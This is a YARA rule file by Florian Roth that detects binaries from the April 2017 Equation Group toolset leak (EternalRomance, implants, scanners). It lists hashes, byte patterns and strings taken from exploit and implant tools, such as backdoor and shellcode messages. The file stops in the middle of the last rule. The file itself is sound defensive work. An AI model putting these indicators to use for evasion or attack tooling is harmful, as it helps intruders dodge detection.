rule EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
    hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
    hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
  strings:
    $s1 = "NtErrorMoreProcessingRequired" ascii fullword
    $s2 = "Command Format Error: Error=%x" ascii fullword
    $s3 = "NtErrorPasswordRestriction" ascii fullword
    $op0 = { 8A 85 58 FF FF FF 88 43 4D }
  condition:
    (uint16(0) == 23117 and filesize < 614400 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_Eternalromance_2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
    hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
    hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
  strings:
    $x1 = "[+] Backdoor shellcode written" ascii fullword
    $x2 = "[*] Attempting exploit method %d" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 614400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__Emphasismine {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
    hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
  strings:
    $x1 = "Error: Could not calloc() for shellcode buffer" ascii fullword
    $x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" ascii fullword
    $x3 = "Generating shellcode" ascii fullword
    $x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" ascii fullword
    $x5 = "Error: Domino is not the expected version. (%s, %s)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Eternalromance {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
    hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
  strings:
    $x1 = "[-] Error: Exploit choice not supported for target OS!!" ascii fullword
    $x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" ascii fullword
    $x3 = "[-] Error: Backdoor not present on target" ascii fullword
    $x4 = "***********    TARGET ARCHITECTURE IS X64    ************" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them) or 2 of them
}

rule EquationGroup_Toolset_Apr17_Gen4 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
    hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
    hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
    hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
    hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
    hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
    hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
    hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
    hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
    hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
    hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
    hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
    hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
    hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
  strings:
    $x1 = "[+] \"TargetPort\"      %hu" ascii fullword
    $x2 = "---<<<  Complete  >>>---" ascii fullword
    $x3 = "[+] \"NetworkTimeout\"  %hu" ascii fullword
    $op1 = { 46 83 C4 0C 83 FE 0C 0F 8C 5E FF FF FF B8 }
  condition:
    (uint16(0) == 23117 and filesize < 153600 and (1 of ($x*) or 2 of them))
}

rule EquationGroup_Toolset_Apr17_Gen1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
    hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
  strings:
    $x1 = "Restart with the new protocol, address, and port as target." ascii fullword
    $x2 = "TargetPort      : %s (%u)" ascii fullword
    $x3 = "Error: strchr() could not find '@' in account name." ascii fullword
    $x4 = "TargetAcctPwd   : %s" ascii fullword
    $x5 = "Creating CURL connection handle..." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Gen2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
    hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
    hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
    hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
  strings:
    $s1 = "[+] Setting password : (NULL)" ascii fullword
    $s2 = "[-] TbBuffCpy() failed!" ascii fullword
    $s3 = "[+] SMB negotiation" ascii fullword
    $s4 = "12345678-1234-ABCD-EF00-0123456789AB" ascii fullword
    $s5 = "Value must end with 0000 (2 NULLs)" ascii fullword
    $s6 = "[*] Configuring Payload" ascii fullword
    $s7 = "[*] Connecting to listener" ascii fullword
    $op1 = { B0 42 40 00 89 44 24 30 C7 44 24 34 }
    $op2 = { EB 59 8B 4C 24 10 68 1C 46 }
  condition:
    (uint16(0) == 23117 and filesize < 81920 and 1 of ($s*) and 1 of ($op*)) or 3 of them
}

rule EquationGroup_Toolset_Apr17_Gen3 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
    hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
    hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
    hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
    hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
    hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
    hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
    hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
    hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
    hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
    hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
    hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
  strings:
    $s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" ascii fullword
    $s2 = "[-] Could not set \"CredentialType\"" ascii fullword
    $op1 = { 46 83 C4 0C 83 FE 0C 0F 8C 5E FF FF FF B8 }
  condition:
    (uint16(0) == 23117 and filesize < 153600 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_yak {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
  strings:
    $x1 = "-xd = dump archive data & store in scancodes.txt" ascii fullword
    $x2 = "-------- driver start token -------" wide fullword
    $x3 = "-------- keystart token -------" wide fullword
    $x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 819200 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_AdUser_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
  strings:
    $s1 = ".?AVFeFinallyFailure@@" ascii fullword
    $s2 = "(&(objectCategory=person)(objectClass=user)(cn=" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 40960 and all of them)
}

rule EquationGroup_Toolset_Apr17_RemoteExecute_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
  strings:
    $op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00 00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00 00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00 63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00 6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00 6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00 00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
  condition:
    (uint16(0) == 23117 and filesize < 40960 and all of them)
}

rule EquationGroup_Toolset_Apr17_Banner_Implant9x {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
  strings:
    $s1 = ".?AVFeFinallyFailure@@" ascii fullword
    $op1 = { C9 C3 57 8D 85 2C EB FF FF }
  condition:
    (uint16(0) == 23117 and filesize < 20480 and all of them)
}

rule EquationGroup_Toolset_Apr17_greatdoc_dll_config {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
  strings:
    $x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
    $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
    $x3 = "GREATERDOCTOR [ commandline args configuration ]" ascii fullword
    $x4 = "-useage: <scanner> \"<cmdline args>\"" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_scanner {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
  strings:
    $x1 = "+daemon_version,system,processor,refid,clock" ascii fullword
    $x2 = "Usage: %s typeofscan IP_address" ascii fullword
    $x3 = "# scanning ip  %d.%d.%d.%d" ascii fullword
    $x4 = "Welcome to the network scanning tool" ascii fullword
    $x5 = "***** %s ***** (length %d)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 92160 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Mcl_NtMemory_Std {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
  strings:
    $op1 = { 44 24 37 50 C6 44 24 38 72 C6 44 }
    $op2 = { 44 24 33 6F C6 44 24 34 77 C6 }
    $op3 = { 3B 65 C6 44 24 3C 73 C6 44 24 3D 73 C6 44 24 3E }
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17_tacothief {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
  strings:
    $x1 = "File too large!  Must be less than 655360 bytes." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17_ntevt {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
  strings:
    $x1 = "c:\\ntevt.pdb" ascii fullword
    $s1 = "ARASPVU" ascii fullword
    $op1 = { 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 }
    $op2 = { F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 }
    $op3 = { 01 41 F6 E0 49 03 C1 88 01 48 33 }
  condition:
    (uint16(0) == 23117 and filesize < 716800 and $x1 or 3 of them)
}

rule EquationGroup_Toolset_Apr17_Processes_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
  strings:
    $s1 = "Select * from Win32_Process" ascii fullword
    $s3 = "\\\\%ls\\root\\cimv2" wide fullword
    $s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_st_lp {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
  strings:
    $x1 = "Previous command: set injection processes (status=0x%x)" ascii fullword
    $x2 = "Secondary injection process is <null> [no secondary process will be used]" ascii fullword
    $x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " ascii fullword
    $x4 = "E: Execute a Command on the Implant" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_FullThreadDump {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "b68f3f32bfa6cf11145c9fb9bf0075a5ca3938ea218b1cc29ad62f7b9e043255"
  strings:
    $s1 = "FullThreadDump.class" ascii fullword
    $s2 = "ThreadMonitor.class" ascii fullword
    $s3 = "Deadlock$DeadlockThread.class" ascii fullword
  condition:
    (uint16(0) == 19280 and filesize < 30720 and all of them)
}

rule EquationGroup_Toolset_Apr17_EpWrapper {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
  strings:
    $x1 = "* Failed to get remote TCP socket address" wide fullword
    $x2 = "* Failed to get 'LPStart' export" wide fullword
    $s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 20480 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_DiBa_Target_2000 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
  strings:
    $s1 = "0M1U1Z1p1" ascii fullword
    $op1 = { F4 65 C6 45 F5 6C C6 45 F6 33 C6 45 F7 32 C6 45 }
    $op2 = { 36 C6 45 E6 34 C6 45 E7 50 C6 45 E8 72 C6 45 E9 }
    $op3 = { C6 45 E8 65 C6 45 E9 70 C6 45 EA 74 C6 45 EB 5F }
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 3 of them)
}

rule EquationGroup_Toolset_Apr17_DllLoad_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
  strings:
    $s1 = "BzWKJD+" ascii fullword
    $op1 = { 44 24 6C 6C 88 5C 24 6D }
    $op2 = { 44 24 54 63 C6 44 24 55 74 C6 44 24 56 69 }
    $op3 = { 44 24 5C 6C C6 44 24 5D 65 C6 44 24 5E }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_EXPA {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
  strings:
    $x1 = "* The target is IIS 6.0 but is not running content indexing servicess," ascii fullword
    $x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" ascii fullword
    $x3 = "By default, the shellcode will attempt to immediately connect s$" ascii fullword
    $x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 12288000 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_RemoteExecute_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
  strings:
    $s1 = "Win32_Process" ascii fullword
    $s2 = "\\\\%ls\\root\\cimv2" wide fullword
    $op1 = { 83 7B 18 01 75 12 83 63 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_DS_ParseLogs {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
  strings:
    $x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" wide fullword
    $x2 = "* Capture header not found at start of buffer" wide fullword
    $x3 = "Usage: %ws <capture_file> <results_prefix>" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Oracle_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
  strings:
    $op0 = { FE FF FF FF 48 89 9C 24 80 21 00 00 48 89 AC 24 }
    $op1 = { E9 34 11 00 00 B8 3E 01 00 00 E9 2A 11 00 00 B8 }
    $op2 = { 48 8B CA E8 BF 84 00 00 4C 8B E0 8D 34 00 44 8D }
  condition:
    (uint16(0) == 23117 and filesize < 512000 and all of them)
}

rule EquationGroup_Toolset_Apr17_DmGz_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
  strings:
    $s1 = "\\\\.\\%ls" ascii fullword
    $s3 = "6\"6<6C6H6M6Z6f6t6" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and all of them)
}

rule EquationGroup_Toolset_Apr17_SetResourceName {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
  strings:
    $x1 = "Updates the name of the dll or executable in the resource file" ascii fullword
    $x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" ascii fullword
    $x3 = "2 = [appinit.dll] level4 dll" ascii fullword
    $x4 = "1 = [spcss32.exe] level3 exe" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_drivers_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
  strings:
    $s1 = ".?AVFeFinallyFailure@@" ascii fullword
    $s2 = "hZwLoadDriver" ascii fullword
    $op1 = { B0 01 E8 58 04 00 00 C3 33 }
  condition:
    (uint16(0) == 23117 and filesize < 30720 and all of them)
}

rule EquationGroup_Toolset_Apr17_Shares_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
  strings:
    $s1 = "Select * from Win32_Share" ascii fullword
    $s2 = "slocalhost" wide fullword
    $s3 = "\\\\%ls\\root\\cimv2" wide fullword
    $s4 = "\\\\%ls\\%ls" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_DUMPEL {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "bf42532be2d36f522dca7d3d3eb40b1d25c33d508a5a37c7e28f148945136dc6"
  strings:
    $x1 = "dumpel -f file [-s \\\\server]" ascii fullword
    $x2 = "records will not appear in the dumped log." ascii fullword
    $x3 = "obj\\i386\\Dumpel.exe" ascii fullword
    $s13 = "DUMPEL Usage:    " ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_ntfltmgr {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
    hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
    hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
  strings:
    $s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" ascii fullword
    $s6 = "w+w;w2w0w6w4w.w(wRw" ascii fullword
    $op1 = { 80 F7 FF FF 49 89 84 34 18 02 00 00 41 83 A4 34 }
    $op2 = { FF 15 0B 34 00 00 EB 92 }
    $op3 = { 4D 8D B4 34 08 02 00 00 4D 85 F6 0F 84 AE }
    $op4 = { 8B CA 2B CE 8D 34 01 0F B7 3E 66 3B 7D F0 89 75 }
    $op5 = { 8A 40 01 00 C7 47 70 }
    $op6 = { E9 3C FF FF FF 6A FF 8D 45 F0 50 E8 27 11 00 00 }
    $op7 = { 8B 45 08 53 57 8B 7D 0C C7 40 34 }
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 4 of them)
}

rule EquationGroup_Toolset_Apr17_DiBa_Target_BH {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
  strings:
    $op0 = { 44 89 20 E9 40 FF FF FF 8B C2 48 8B 5C 24 60 48 }
    $op1 = { 45 33 C9 49 8D 7F 2C 41 BA }
    $op2 = { 89 44 24 34 EB 17 4C 8D 44 24 28 8B 54 24 30 48 }
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule EquationGroup_Toolset_Apr17_PC_LP {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
  strings:
    $s1 = "* Failed to get connection information.  Aborting launcher!" wide fullword
    $s2 = "Format: <command> <target port> [lp port]" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_RemoteCommand_Lp {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
  strings:
    $s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" wide fullword
    $s2 = "Unable to get TCP listen port: %08x" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_lp_mstcp {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd"
  strings:
    $s1 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s2 = "_PacketNDISRequestComplete@12\"" ascii fullword
    $s3 = "_LDNdis5RegDeleteKeys@4" ascii fullword
    $op1 = { 89 7E 04 75 06 66 21 46 02 EB }
    $op2 = { FC 74 1B 8B 49 04 0F B7 D3 66 83 }
    $op3 = { AA 0F B7 45 FC 8B 52 04 8D 4E }
  condition:
    (uint16(0) == 23117 and filesize < 102400 and (all of ($s*) or all of ($op*)))
}

rule EquationGroup_Toolset_Apr17_renamer {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
